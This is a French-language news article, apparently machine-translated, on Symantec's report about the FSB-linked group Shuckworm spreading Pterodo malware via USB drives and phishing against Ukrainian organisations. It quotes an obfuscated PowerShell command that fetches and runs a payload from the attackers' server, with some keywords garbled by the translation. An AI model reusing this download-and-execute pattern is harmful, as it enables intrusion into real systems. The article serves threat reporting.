Getty Images
Des pirates informatiques travaillant pour le Service fédéral de sécurité russe ont lancé plusieurs cyberattaques qui ont utilisé des logiciels malveillants basés sur USB pour voler de grandes quantités de données à des cibles ukrainiennes afin de les utiliser dans son invasion en cours de son petit voisin, ont déclaré des chercheurs.
“Les secteurs et la nature des organisations et des machines ciblées peuvent avoir donné aux attaquants l’accès à des quantités importantes d’informations sensibles”, ont écrit des chercheurs de Symantec, désormais propriété de Broadcom, dans un article jeudi. “Il y avait des indications dans certaines organisations que les attaquants se trouvaient sur les machines des services des ressources humaines des organisations, indiquant que les informations sur les personnes travaillant dans les différentes organisations étaient une priorité pour les attaquants, entre autres.”
Le groupe, que Symantec suit sous le nom de Shuckworm et d’autres chercheurs appellent Gamaredon et Armageddon, est actif depuis 2014 et est lié au FSB russe, le principal service de sécurité de ce pays. Le groupe se concentre uniquement sur l’obtention de renseignements sur des cibles ukrainiennes. En 2020, des chercheurs de la société de sécurité SentinelOne ont déclaré que le groupe de piratage avait “attaqué plus de 5 000 entités individuelles à travers l’Ukraine, avec un accent particulier sur les zones où les troupes ukrainiennes sont déployées”.
En février, Shuckworm a commencé à déployer de nouveaux logiciels malveillants et une nouvelle infrastructure de commande et de contrôle qui ont réussi à pénétrer les défenses de plusieurs organisations ukrainiennes dans l’armée, les services de sécurité et le gouvernement de ce pays. Les membres du groupe semblent plus intéressés à obtenir des informations liées à des informations militaires sensibles qui pourraient être utilisées à mauvais escient lors de l’invasion russe en cours.
Cette nouvelle campagne a lancé un nouveau malware sous la forme d’un script PowerShell qui propage Pterodo, une porte dérobée créée par Shuckworm. Le script s’active lorsque des clés USB infectées sont connectées aux ordinateurs ciblés. Le script malveillant se copie d’abord sur la machine ciblée pour créer un fichier de raccourci avec l’extension rtf.lnk. Les fichiers portent des noms tels que video_porn.rtf.lnk, do_not_delete.rtf.lnk et evidence.rtf.lnk. Les noms, qui sont pour la plupart en ukrainien, sont une tentative d’inciter les cibles à ouvrir les fichiers afin qu’ils installent Pterodo sur les machines.
Publicité
Le script continue d’énumérer tous les lecteurs connectés à l’ordinateur ciblé et de se copier sur tous les lecteurs amovibles connectés, très probablement dans l’espoir d’infecter tous les périphériques isolés, qui ne sont intentionnellement pas connectés à Internet dans le but de les empêcher de être piraté.
Pour brouiller les pistes, Shuckworm a créé des dizaines de variantes et a rapidement fait pivoter les adresses IP et l’infrastructure qu’il utilise pour la commande et le contrôle. Le groupe utilise également des services légitimes tels que Telegram et sa plate-forme de micro-blogging Telegraph pour le commandement et le contrôle dans une autre tentative d’éviter la détection.
Shuckworm utilise généralement les e-mails de phishing comme vecteur initial dans les ordinateurs des cibles. Les e-mails contiennent des pièces jointes malveillantes qui se font passer pour des fichiers avec des extensions, notamment .docx, .rar, .sfx, lnk et hta. Les e-mails utilisent souvent des sujets tels que les conflits armés, les procédures pénales, la lutte contre la criminalité et la protection des enfants comme leurres pour inciter les cibles à ouvrir les e-mails et à cliquer sur les pièces jointes.
Les chercheurs de Symantec ont déclaré qu’un ordinateur infecté qu’ils avaient récupéré lors de la campagne était typique de son fonctionnement. Ils ont écrit:
Chez une victime, le premier signe d’activité malveillante a été lorsque l’utilisateur a semblé ouvrir un fichier d’archive RAR qui avait probablement été envoyé via un e-mail de harponnage et qui contenait un document malveillant.
Après l’ouverture du document, une commande PowerShell malveillante a été observée en cours d’exécution pour télécharger la charge utile de l’étape suivante à partir du serveur C&C des attaquants :
“CSIDL_SYSTEMcmd.exe” /c start /min “” powershell -w caché
“$gt=”/get.”+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+4
8);[system.net.servicepointmanager]::servercertificatevalidationcallb
ack={$true};$hosta+=’.vafikgo.’;$hosta+=[char](57+57);$hosta+=[char](
60+57);$adresse=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.ad
dresslist[0];$client=(nouvel-objet
net.webclient);$faddr=”htt”+’ps://’+$addr+$gt;$text=$client.downloads
tring($fadr);iex $texte”
Plus récemment, Symantec a observé que Shuckworm utilisait davantage d’adresses IP dans ses scripts PowerShell. Il s’agit probablement d’une tentative d’éluder certaines méthodes de suivi employées par les chercheurs.
Shuckworm continue également de mettre à jour les techniques d’obscurcissement utilisées dans ses scripts PowerShell pour tenter d’éviter la détection, avec jusqu’à 25 nouvelles variantes des scripts du groupe observées par mois entre janvier et avril 2023.
Le message de jeudi comprend des adresses IP, des hachages, des noms de fichiers et d’autres indicateurs de compromission que les gens peuvent utiliser pour détecter s’ils ont été ciblés. Le poste avertit également que le groupe représente une menace que les cibles doivent prendre au sérieux.
“Cette activité démontre que la focalisation incessante de Shuckworm sur l’Ukraine se poursuit”, ont-ils écrit. “Il semble clair que les groupes d’attaque soutenus par les États-nations russes continuent de viser des cibles ukrainiennes dans le but de trouver des données susceptibles d’aider leurs opérations militaires.”
